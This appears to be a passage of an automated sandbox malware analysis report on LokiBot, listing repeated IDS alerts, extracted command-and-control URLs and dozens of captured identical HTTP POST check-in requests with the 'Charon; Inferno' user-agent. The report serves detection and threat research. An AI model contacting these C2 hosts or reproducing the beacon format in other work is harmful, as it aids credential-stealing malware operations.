                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49826 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49827 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49828 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49829 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49830 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49831 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49832 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49833 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49834 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49835 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49837 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49839 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49840 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49841 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49842 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49843 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49844 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49845 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49846 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49847 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49848 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49849 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49850 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49851 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49852 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49853 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49854 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49855 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49856 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49857 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49858 -> 203.170.84.89:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49858 -> 203.170.84.89:80
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Malware configuration extractorURLs: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php
                  Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
